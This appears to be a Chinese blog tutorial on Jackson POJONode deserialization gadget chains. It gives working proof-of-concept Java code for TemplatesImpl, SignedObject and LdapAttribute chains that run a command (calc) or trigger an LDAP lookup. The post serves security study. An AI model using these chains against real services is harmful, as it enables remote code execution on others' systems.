前言

Springboot一般都会自带JackSon这个依赖包,JackSonFastjson有相同的功效

简单复现

  1. package com.example.jakeson.demo;
  2. import java.io.IOException;
  3. import java.io.Serializable;
  4. public class User implements Serializable {
  5. public User() {
  6. }
  7. public Object getName() throws IOException {
  8. Runtime.getRuntime().exec("calc");
  9. return "1";
  10. }
  11. public Object setName(String name) {
  12. System.out.println("setname");
  13. return "2";
  14. }
  15. }
  1. package com.example.jakeson.demo;
  2. import com.fasterxml.jackson.databind.node.POJONode;
  3. public class JakesonDemo {
  4. public static void main(String[] args) {
  5. User user = new User();
  6. POJONode jsonNodes = new POJONode(user);
  7. jsonNodes.toString();
  8. }
  9. }

运行即可弹计算器

Jackson反序列化利用链

注意点

PoJoNode类是继承ValueNodeValueNode是继承BaseJsonNode类,我们看看BaseJsonNode



它拥有writeReplace方法,有这个方法就意味着反序列化时不会走正常渠道,而是走这个writeReplace方法,这是反序列化的规则,解决办法就是重写BaseJsonNode

把这个writeReplace注释掉即可

TemplatesImpl链

  1. package com.example.jakeson.demo;
  2. import com.fasterxml.jackson.databind.node.POJONode;
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  5. import javassist.*;
  6. import org.springframework.http.HttpEntity;
  7. import org.springframework.http.HttpHeaders;
  8. import org.springframework.http.ResponseEntity;
  9. import org.springframework.web.client.RestTemplate;
  10. import javax.management.BadAttributeValueExpException;
  11. import javax.xml.transform.Templates;
  12. import java.io.*;
  13. import java.lang.reflect.Field;
  14. import java.net.URI;
  15. import java.util.Base64;
  16. public class TemplatesImplDemo {
  17. public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
  18. Field f = obj.getClass().getDeclaredField(fieldName);
  19. f.setAccessible(true);
  20. f.set(obj, value);
  21. }
  22. public static void main(String[] args) throws Exception {
  23. ClassPool pool = ClassPool.getDefault();
  24. pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
  25. CtClass ct = pool.makeClass("Cat");
  26. String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
  27. ct.makeClassInitializer().insertBefore(cmd);
  28. String randomClassName = "EvilCat" + System.nanoTime();
  29. ct.setName(randomClassName);
  30. ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
  31. byte[][] bytes = new byte[][]{ct.toBytecode()};
  32. Templates templatesImpl = new TemplatesImpl();
  33. setFieldValue(templatesImpl, "_bytecodes", bytes);
  34. setFieldValue(templatesImpl, "_name", "a");
  35. setFieldValue(templatesImpl, "_tfactory", null);
  36. POJONode pojoNode = new POJONode(templatesImpl);
  37. BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
  38. Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  39. val.setAccessible(true);
  40. val.set(exp,pojoNode);
  41. System.out.println(serial(exp));
  42. deserial(serial(exp));
  43. }
  44. public static String serial(Object o) throws IOException, NoSuchFieldException {
  45. ByteArrayOutputStream baos = new ByteArrayOutputStream();
  46. ObjectOutputStream oos = new ObjectOutputStream(baos);
  47. oos.writeObject(o);
  48. oos.close();
  49. String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
  50. return base64String;
  51. }
  52. public static void deserial(String data) throws Exception {
  53. byte[] base64decodedBytes = Base64.getDecoder().decode(data);
  54. ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);
  55. ObjectInputStream ois = new ObjectInputStream(bais);
  56. ois.readObject();
  57. ois.close();
  58. }
  59. }

TemplatesImpl的流程就不跟了,简单的跟一下Jackson的流程,BadAVEE里面触发toString

进入到重写的BaseJsonNode类的toString方法

中间流程断了,。。。。,跟到最后,在StdSerializer类中wrapAndThrow方法调用到了getter

SignObject链

二次反序列化,无需多讲

  1. package com.example.jakeson.demo;
  2. import com.fasterxml.jackson.databind.node.POJONode;
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  5. import javassist.ClassClassPath;
  6. import javassist.ClassPool;
  7. import javassist.CtClass;
  8. import javax.management.BadAttributeValueExpException;
  9. import javax.xml.transform.Templates;
  10. import java.io.*;
  11. import java.lang.reflect.Field;
  12. import java.security.*;
  13. import java.util.Base64;
  14. public class SignObjectDemo {
  15. public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
  16. Field f = obj.getClass().getDeclaredField(fieldName);
  17. f.setAccessible(true);
  18. f.set(obj, value);
  19. }
  20. public static void main(String[] args) throws Exception {
  21. ClassPool pool = ClassPool.getDefault();
  22. pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
  23. CtClass ct = pool.makeClass("Cat");
  24. String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
  25. ct.makeClassInitializer().insertBefore(cmd);
  26. String randomClassName = "EvilCat" + System.nanoTime();
  27. ct.setName(randomClassName);
  28. ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
  29. byte[][] bytes = new byte[][]{ct.toBytecode()};
  30. Templates templatesImpl = new TemplatesImpl();
  31. setFieldValue(templatesImpl, "_bytecodes", bytes);
  32. setFieldValue(templatesImpl, "_name", "a");
  33. setFieldValue(templatesImpl, "_tfactory", null);
  34. POJONode pojoNode = new POJONode(templatesImpl);
  35. BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
  36. Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  37. val.setAccessible(true);
  38. val.set(exp,pojoNode);
  39. KeyPairGenerator keyPairGenerator;
  40. keyPairGenerator = KeyPairGenerator.getInstance("DSA");
  41. keyPairGenerator.initialize(1024);
  42. KeyPair keyPair = keyPairGenerator.genKeyPair();
  43. PrivateKey privateKey = keyPair.getPrivate();
  44. Signature signingEngine = Signature.getInstance("DSA");
  45. SignedObject signedObject = new SignedObject(exp,privateKey,signingEngine);
  46. POJONode pojoNode2 = new POJONode(signedObject);
  47. BadAttributeValueExpException exp2 = new BadAttributeValueExpException(null);
  48. Field val2 = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  49. val2.setAccessible(true);
  50. val2.set(exp2,pojoNode2);
  51. System.out.println(serial(exp2));
  52. deserial(serial(exp2));
  53. }
  54. public static String serial(Object o) throws IOException, NoSuchFieldException {
  55. ByteArrayOutputStream baos = new ByteArrayOutputStream();
  56. ObjectOutputStream oos = new ObjectOutputStream(baos);
  57. oos.writeObject(o);
  58. oos.close();
  59. String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
  60. return base64String;
  61. }
  62. public static void deserial(String data) throws Exception {
  63. byte[] base64decodedBytes = Base64.getDecoder().decode(data);
  64. ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);
  65. ObjectInputStream ois = new ObjectInputStream(bais);
  66. ois.readObject();
  67. ois.close();
  68. }
  69. }

LdapAttribute链

  1. package com.example.jakeson.demo;
  2. import com.fasterxml.jackson.databind.node.POJONode;
  3. import javax.management.BadAttributeValueExpException;
  4. import javax.naming.CompositeName;
  5. import java.io.*;
  6. import java.lang.reflect.Constructor;
  7. import java.lang.reflect.Field;
  8. import java.util.Base64;
  9. public class LdapAttributeDemo {
  10. public static void main( String[] args ) throws Exception {
  11. String ldapCtxUrl = "ldap://127.0.0.1:1099/";
  12. Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
  13. Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
  14. new Class[] {String.class});
  15. ldapAttributeClazzConstructor.setAccessible(true);
  16. Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
  17. new Object[] {"name"});
  18. Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
  19. baseCtxUrlField.setAccessible(true);
  20. baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);
  21. Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
  22. rdnField.setAccessible(true);
  23. rdnField.set(ldapAttribute, new CompositeName("a//b"));
  24. POJONode jsonNodes = new POJONode(ldapAttribute);
  25. BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
  26. Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
  27. val.setAccessible(true);
  28. val.set(exp,jsonNodes);
  29. deserial(serial(exp));
  30. }
  31. public static String serial(Object o) throws IOException, NoSuchFieldException, IOException {
  32. ByteArrayOutputStream baos = new ByteArrayOutputStream();
  33. ObjectOutputStream oos = new ObjectOutputStream(baos);
  34. oos.writeObject(o);
  35. oos.close();
  36. String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
  37. return base64String;
  38. }
  39. public static void deserial(String data) throws Exception {
  40. byte[] base64decodedBytes = Base64.getDecoder().decode(data);
  41. ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);
  42. ObjectInputStream ois = new ObjectInputStream(bais);
  43. ois.readObject();
  44. ois.close();
  45. }
  46. private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
  47. Field f = obj.getClass().getDeclaredField(field);
  48. f.setAccessible(true);
  49. f.set(obj, arg);
  50. }
  51. }

LdapAttribute类中有getter方法调用了lookup



两处入口,上面poc进入的是getAttributeDefinition方法,payload有些讲究,我们之前的payload都是ldap://xxxxx/xxx,这里payload必须是ldap://xxxx/不需要后缀了,具体原因是,艹了,没有java文件调试不了,不想去下了,大伙去看别的师傅的思路吧

JackSon反序列化通杀的更多相关文章

  1. 通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击

    通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击 大家肯定知道前几天刚爆出来一个linux内核(Android也用的linux内核)的dirtycow漏洞.此洞可 ...

  2. 小白审计JACKSON反序列化漏洞

    1. JACKSON漏洞解析 poc代码:main.java import com.fasterxml.jackson.databind.ObjectMapper; import com.sun.or ...

  3. Postsharp 破解工具(通杀版,持续更新)

    2019.04.18 重要说明 VS2019 正式版已经发布了,Postsharp v6.2.2-Preview(预览版)也开始支持VS2019.不过截至目前,该预览版还不是特别稳定,因此提醒下大家在 ...

  4. [.NET] [.net 脱壳工具]Sixxpack 最新脱壳机 通杀Sixxpack全版本by -=Msdn5 君临=

    [.net 脱壳工具]Sixxpack 最新脱壳机 通杀Sixxpack全版本by -=Msdn5 君临=- 识别方法: 如果无法调戏,请上传附件艾特我.............发帖不易啊..身处大西 ...

  5. DedeCMS全版本通杀SQL注入漏洞利用代码及工具

    dedecms即织梦(PHP开源网站内容管理系统).织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友 ...

  6. 飘逸的python - 极简的二叉树前中后序通杀函数

    对于任一结点.能够按某种次序运行三个操作: 訪问结点本身(N) 遍历该结点的左子树(L) 遍历该结点的右子树(R) 用来表示顺序,即,前序NLR/中序LNR/后序LRN. 以下我们用namedtupl ...

  7. X86逆向2:提取按钮通杀特征码

    本章我们将学习特征码的提取与定位,特征码是软件中一段固定的具有标志性的代码片段,特征码的用途非常广泛,最常见的就是杀毒软件的查杀了,查杀就是根据特征码定位技术实现的,再比如木马的免杀也是修改了特征码的 ...

  8. CVE-2017-11882:Microsoft office 公式编辑器 font name 字段栈溢出通杀漏洞调试分析

    \x01 漏洞简介 在 2017 年 11 月微软的例行系统补丁发布中,修复了一个 Office 远程代码执行漏洞(缓冲区溢出),编号为 CVE-2017-11882,又称为 "噩梦公式&q ...

  9. 【渗透实战】那些奇葩的WAF_第二期_无意发现通杀漏洞,空字节突破上传!

    /文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334 未经许可,禁止转载/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何 ...

  10. r0capture安卓应用层通杀脚本-使用文档

    本文所有教程及源码.软件仅为技术研究.不涉及计算机信息系统功能的删除.修改.增加.干扰,更不会影响计算机信息系统的正常运行.不得将代码用于非法用途,如侵立删! r0capture安卓应用层通杀脚本-使 ...

随机推荐

  1. 那些.NET中的连接池

    前言 在.NET中,连接池被广泛用于管理和优化不同类型资源的连接.连接池可以减少建立和关闭连接所需的时间和资源消耗,从而提高了应用程序的性能和响应能力. HttpClient中的连接池 System. ...

  2. Zabbix“专家坐诊”第190期问答汇总

    问题一 Q:请问为啥用拓扑图监控交换机接口流量,获取不到数据,显示未知,键值也没错 ,最新数据也能看到,是什么原因呢? A:把第一个值改成主机名. 问题二 Q:请问下zabbix server 有什么 ...

  3. Prometheus常用exporter及其常用监控指标

    node-exporter常用监控指标 CPU相关指标: node_cpu_seconds_total{mode="idle"}:CPU空闲时间(秒)的总和.这是评估CPU使用率的 ...

  4. 基于六轴传感器MPU6050的加速度和角度值读取

    一 系统简介 1.简介 MPU-60x0 是全球首例 9 轴运动处理传感器.它集成了 3 轴MEMS陀螺仪,3 轴MEMS加速度计,以及一个可扩展的数字运动处理器 DMP(Digital Motion ...

  5. Android Studio导入Android 4.2.2的WiFi-Display系统源码

    Sink源码概述 Miracast Sink端源码最早出现在Android 4.2.2上,通过googlesource可以很方便的查看: https://android.googlesource.co ...

  6. FTP的配置和管理

    实验环境: 两台windows servers 一台已经配置了FTP服务器,IP为192.168.1.220,vmnet1 一台作为客户端测试,IP为192.168.1.138,vmnet1 一:FT ...

  7. Adapter分组封装

    YCGroupAdapter 01.前沿说明 1.1 案例展示效果 1.2 该库功能和优势 1.3 相关类介绍说明 02.如何使用 2.1 如何引入 2.2 最简单使用 2.3 使用建议 03.常用a ...

  8. window-命令行操作

    window命令行操作 调起命令行-win+r输入cmd 网络探活 ping www.baidu.com 快捷启动应用 打开记事本 notepad 打开画图 mspaint 打开计算器 calc 命令 ...

  9. 为什么延迟删除可以保证MYSQL 与redis的一致性?

    看过很多保持MYSQL 与redis保持一致性的文章都提到了延迟删除,其实脱离任何业务场景的设计都是不切实际的,所以我会本着一个通用的读写场景去分析为什么延迟删除大概率可以保证MYSQL与redis的 ...

  10. 工作记录:TypeScript从入门到项目实战(进阶篇)

    内置对象的使用 JavaScript中有许多内置对象,可以直接在JavaScript程序中使用,同样的,TypeScript也延续了这些内置对象 全局的对象( global objects )或称标准 ...